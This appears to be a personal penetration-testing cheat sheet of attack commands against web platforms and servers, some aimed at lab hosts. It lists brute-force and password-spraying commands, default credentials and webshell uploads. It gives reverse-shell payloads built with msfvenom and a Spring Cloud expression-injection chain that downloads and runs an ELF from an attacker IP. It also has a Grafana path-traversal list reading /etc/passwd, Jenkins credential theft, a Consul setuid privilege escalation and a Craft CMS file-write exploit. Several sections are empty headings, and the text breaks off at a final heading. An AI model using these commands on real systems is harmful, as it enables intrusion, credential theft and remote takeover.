CMS / Servers / Others

00. Webroot

/var/www/html/            # Apache	
/usr/local/nginx/html/    # Nginx	
c:\inetpub\wwwroot\       # IIS	
C:\xampp\htdocs\          # XAMPP

01. Wordpress

  • Scan

## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>

## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>

## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php
  • Bruteforce password/username

## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>

## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py          
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>
  • Username/Password

select user_login,user_pass from wp_users;
  • Webshell

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i

## Or

## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php

## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php

## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
 
## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>"})')"                        
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>","port":"4545"})')"

02. Joomla

## ------------------| Identify version
# Navigate to 
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>

## ------------------| Run scan
joomscan -u <URL>
  • CVE-2023-23752 (Authentication bypass resulting in an information leak)

## ------------------| Affected Versions
Joomla! < 4.2.8

## ------------------| Manual Exploit
curl 'http://<IP>/api/index.php/v1/config/application?public=true'

## ------------------| Automated
git clone https://github.com/ThatNotEasy/CVE-2023-23752 && cd CVE-2023-23752
pip3 install -r requirements.txt
python3 joomla.py

03. Drupal

03.1 Enumerations

## ------------------| Username enumeration
### Check if we can register new user (search for "name is already taken")
/user/register

### Check access status 
/user/<number>
/user/1            
### 403 --> user exists
### 404 --> user doesn't exist

## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ

03.2 Upload shell

## ------------------| Check "plugin php" status
/modules/php
### if status is 403 --> "plugin php" exists/installed

## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save

## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview

04. Tomcat

## ------------------| Endpoint permissions
/manager/html      # <--- roles="manager-gui" 
/manager/text/list # <--- roles="manager-script"  [If /manager/text is reachable, a war file can be deployed with curl]  
/host-manager/html # <--- roles="admin-gui"

## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/        # <--- not work for upload war files
/notexsits/..;/manager/          # <--- not work for upload war files
## Remember to put '/' at the end ^

## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>

## ------------------| Upload paths
/manager/deploy?war=file&path=/shell    ## Tomcat6
/manager/text/deploy?path=/shell        ## Tomcat7 and above

## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd      

## ------------------| Manually Upload  
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
## Then copy shell.war into the \tomcat\webapps\ directory
## Then run \bin\startup.[sh/bat] to restart the service, which extracts the war file.
## Now you can use http://<IP>/shell/

05. Nginx

## ------------------| If the config looks like this
location /admin { 
    <--code-->
}

## ------------------| It has an LFI (path traversal); try this
admin../config.php

05. SharePoint / OWA

05.1 SharePoint

## ------------------| Important directories 
/_layouts/viewlsts.aspx

05.2 OWA

## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit      
cd SprayingToolkit/
pip3 install -r requirements.txt

## ------------------| Create username list (the default format is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01

06. Jenkins

  • Interesting endpoints

/manage
/script
/credentials
  • Configuration files

## ------------------| Linux
/var/jenkins_home/config.xml
/var/jenkins_home/users/users.xml
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key 
/var/jenkins_home/users/admin_*/config.xml
/var/jenkins_home/secrets/hudson.util.Secret
/var/jenkins_home/secrets/initialAdminPassword
/var/lib/jenkins/config.xml
/var/lib/jenkins/users/users.xml
/var/lib/jenkins/credentials.xml
/var/lib/jenkins/secrets/master.key 
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/secrets/hudson.util.Secret
/var/lib/jenkins/secrets/initialAdminPassword

## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\credentials.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\users.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key 
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
  • Reset password [Read full post from here]

## ------------------| Method I (Reset Password)
## Edit following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## The bcrypt password hash is stored under the <passwordHash> tag [here the value used is h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins

## ------------------| Method II (Decrypt Password using console)
## If you have access to /script, run the following in the script console
## Get password hash from \users\<username>\config.xml
hudson.util.Secret.decrypt '<HASH>'

## ------------------| Method III (Decrypt Password offline)
## Download following files
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key
/var/jenkins_home/secrets/hudson.util.Secret
## Get ssh keys
git clone https://github.com/hoto/jenkins-credentials-decryptor.git && cd jenkins-credentials-decryptor && make build
./bin/jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml -o text
## Get Password
pip install pycryptodome
## ------------------| Manual
wget http://<JENKINS_URL>/jnlpJars/jenkins-cli.jar
java -jar jenkins-cli.jar -s <JENKINS_URL> connect-node '@/etc/passwd'
java -jar jenkins-cli.jar -s <JENKINS_URL> reload-job '@/etc/passwd' 

## ------------------| Automate 
wget https://www.exploit-db.com/raw/51993 -O expo.py
python3 expo.py -u http://$IP:8080 -p /etc/passwd
  • Remote Code Execution

  • Create New Job

  • Schedule Method

  • Trigger Remotely Method

## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]" 
## Ex: curl "http://h4rithd:11afe9af0327e90fed163da849a39837bc@object.htb:8080/job/TestRun/build?token=h4rithdToken"             

07. Grafana

## ------------------| Config file locations / path traversal
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

08. Consul

echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p

09. Spring Framework

### CVE-2022-22965 (Spring Boot version 2.6.5)
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/
  • Spring Cloud Function Vulnerability (CVE-2022-22963)

## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'

## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection

10. Craft CMS

## ------------------| Affected versions: 4.0.0-RC1 – 4.4.14 
## Check for phpinfo
curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'          

## ------------------| RCE Path
## Create h4rithd.msl file 
<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="http://attacker_ip:8000/vuln.png" />
 <write filename="/var/www/html/web/shell.php" />
</image>

## ------------------| Create the vuln.png
exiftool -comment="<?php phpinfo(); ?>" vuln.png

## ------------------| Exploit
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -H 'Content-Type: multipart/form-data' -F 'action=conditions/render' -F 'configObject[class]=craft\elements\conditions\ElementCondition' -F 'config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}' -F 'filename=@h4rithd.msl'
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:/tmp/php*"}}}'
curl -k "http://surveillance.htb/shell.php" -x localhost:8080 --output -

## ------------------| Metasploit
use exploit/multi/http/cmsms_object_injection_rce
set RHOSTS <IP>
set ForceExploit true
exploit

11. Nagios

## ------------------| Authenticate with API 
### Create token
curl -ksX POST https://<HOST>/nagiosxi/api/v1/authenticate -d 'username=<USER>&password=<PASS>&valid_min=500'
### Login to the server
https://<HOST>/nagiosxi/?token=<TOKEN>
### Add new user
curl -XPOST --insecure "https://<HOST>/nagiosxi/api/v1/system/user?apikey=<KEY>&pretty=1" -d "username=h4rithd&password=h4rithd&name=h4rithd&email=h4rithd@localhost&auth_level=admin"
### Login using h4rithd:h4rithd creds

### Use SQL map to get admin api key
sqlmap -u "https://<HOST>/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<AUTH_TOKEN>" --level 5 --risk 3 -p id --batch -D nagiosxi --dump -T xi_users
Remote Code Execution
